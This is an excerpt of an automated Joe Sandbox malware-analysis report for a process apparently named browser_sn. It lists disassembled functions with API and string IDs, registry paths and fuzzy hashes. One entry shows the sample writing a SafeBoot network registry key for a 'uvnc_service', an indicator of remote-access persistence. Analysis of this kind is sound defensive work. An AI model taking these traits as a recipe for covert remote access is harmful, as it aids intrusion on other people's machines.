                                                                            • Instruction Fuzzy Hash: E8B1B032A08A42C9E7548F25C8403BD37A1EB56B5EF44013ADEAE8B7D9CEB8E441C754
                                                                            Function 00007FF6C2BD7530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: EnumDisplayDevicesA$USER32
                                                                            • API String ID: 145871493-2970514552
                                                                            • Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                            • Instruction ID: e41c5999d4a81be14b82a5d4443ddd038c4d0c01656d9c32d3494edd018c64fe
                                                                            • Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                            • Instruction Fuzzy Hash: 8631D336608B8281EA60CF15E4442EA72A0FB8679DF540136DEDD83789EF7CD801C700
                                                                            Function 00007FF6C2BD7410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: EnumDisplayDevicesA$USER32
                                                                            • API String ID: 145871493-2970514552
                                                                            • Opcode ID: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                                            • Instruction ID: 6386f9a900cd6fa43cf4ee7d7d3a21cbb2dd664d72b37476d844773289461ca5
                                                                            • Opcode Fuzzy Hash: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                                            • Instruction Fuzzy Hash: C5319031A08B8285EAA1CF15E4446E967B0FB8AB9DF580235DEDD83798DF7CE5018B00
                                                                            Function 00007FF6C2BD72F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: EnumDisplayDevicesA$USER32
                                                                            • API String ID: 145871493-2970514552
                                                                            • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                            • Instruction ID: 1d721e85b6f952a8e12ad950f595562daaddd5fab908c29b0bb9f137b11495c6
                                                                            • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                            • Instruction Fuzzy Hash: 67315032608B8686EBA0CF15A4546E963B0FB8ABA9F544275DEDD83798DF7CD4068700
                                                                            Function 00007FF6C2B86BA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: CSDVersion$Software\Microsoft\Windows NT\CurrentVersion
                                                                            • API String ID: 3677997916-605553437
                                                                            • Opcode ID: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                                            • Instruction ID: d7f4ad4629e1241bb266c75e46892440b983b793e34f872d952a90e143766ef5
                                                                            • Opcode Fuzzy Hash: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                                            • Instruction Fuzzy Hash: 03318161A1968381EBA08F20E49077A77A0FB8535EF401232FBDE87B94DFADD455CB00
                                                                            Function 00007FF6C2BD71D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: EnumDisplayDevicesA$USER32
                                                                            • API String ID: 145871493-2970514552
                                                                            • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                            • Instruction ID: 281d9b0e2ad8a423ccbd478082909f27cb83c0be838b719b4b87d81e11ffc5fc
                                                                            • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                            • Instruction Fuzzy Hash: 0C217132B08B8282E7A0DF11E4447EA63A5FB8A799F554235DEDD83788DF7DD8058740
                                                                            Function 00007FF6C2B867E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
                                                                            • API String ID: 3677997916-1834015684
                                                                            • Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                            • Instruction ID: 6618c5ea69e596ba3994517743b29b24e6d9bfc34faeac9aed5ab90c4abfefa4
                                                                            • Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                            • Instruction Fuzzy Hash: 26214F61A18A8381EBA0CF20E4447AA73A4FB5579DF441136DB8D877A8EFBDD085CB04
                                                                            Function 00007FF6C2B86CC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: System\CurrentControlSet\Control\Terminal Server$TSAppCompat
                                                                            • API String ID: 3677997916-252502655
                                                                            • Opcode ID: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                                            • Instruction ID: 25d7e86081c148c0d35551bb1e4db9f04270fcc1f74129a204c938d8b9f3d36a
                                                                            • Opcode Fuzzy Hash: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                                            • Instruction Fuzzy Hash: FF015E71618B8286EB508F21E88476AB764FB8479DF400135EACD86B68EFBCD158CB44
                                                                            Function 00007FF6C2B8D790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfileWrite$SectionStringwsprintf
                                                                            • String ID: Permissions$isWritable
                                                                            • API String ID: 4007284473-46173998
                                                                            • Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                            • Instruction ID: 373e268c755e4292a6b7585ec05e39ffa50a14a2f81e733b368c1396a259025c
                                                                            • Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                            • Instruction Fuzzy Hash: E8014875A08A4792EA908F11E8911B53370FF89B4EF441032DE8DC6354EEACE169C740
                                                                            Function 00007FF6C2B8A4C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenValue
                                                                            • String ID: Control Panel\Desktop$WallpaperStyle
                                                                            • API String ID: 779948276-747434185
                                                                            • Opcode ID: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                                            • Instruction ID: 5f4cb30dce472a553b588c8dc207cb1f697f3a8256491a453557044bea3c522d
                                                                            • Opcode Fuzzy Hash: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                                            • Instruction Fuzzy Hash: 78014F75A18A9282DB50CF24F84456A73B0FB857A9F905331EEAD83BE8DF6DD504CB40
                                                                            Function 00007FF6C2B8A440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Desktop$WallpaperStyle
                                                                            • API String ID: 3677997916-747434185
                                                                            • Opcode ID: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                                            • Instruction ID: 01a9de4433f1fe84924af46ea115f2dc85fb257f516938abf6a9a545ade9cacb
                                                                            • Opcode Fuzzy Hash: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                                            • Instruction Fuzzy Hash: 2BF0F625A08A5281EA508F14F89466A7774FB8578EF900231DB8D83B68DF6DD159CB40
                                                                            Function 00007FF6C2B93760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 23registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Delete_errno_invalid_parameter_noinfo_snprintf
                                                                            • String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
                                                                            • API String ID: 1597899911-1199838351
                                                                            • Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                            • Instruction ID: cdf5c17dc7680cfab11f3314c13742272f1551f751563453e44852fcf08fb43f
                                                                            • Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                            • Instruction Fuzzy Hash: 9AF03065A28A8691EA909F60F4513BA6370FF8431DFC01236EB9D87798DFBCD119C744
                                                                            Function 00007FF6C2C3929C Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 1050512615-0
                                                                            • Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                            • Instruction ID: 6e7be6d167ad94e5eb4115c80f3b97c77110f6c5910a87c3f47976b3c67cef18
                                                                            • Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                            • Instruction Fuzzy Hash: 0A71B152A0C2D385F7E14E71955017E2BB4AB01B8EF189431EFDD8779ACEACE469CB10
                                                                            Function 00007FF6C2BB0B70 Relevance: 7.6, APIs: 5, Instructions: 107windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
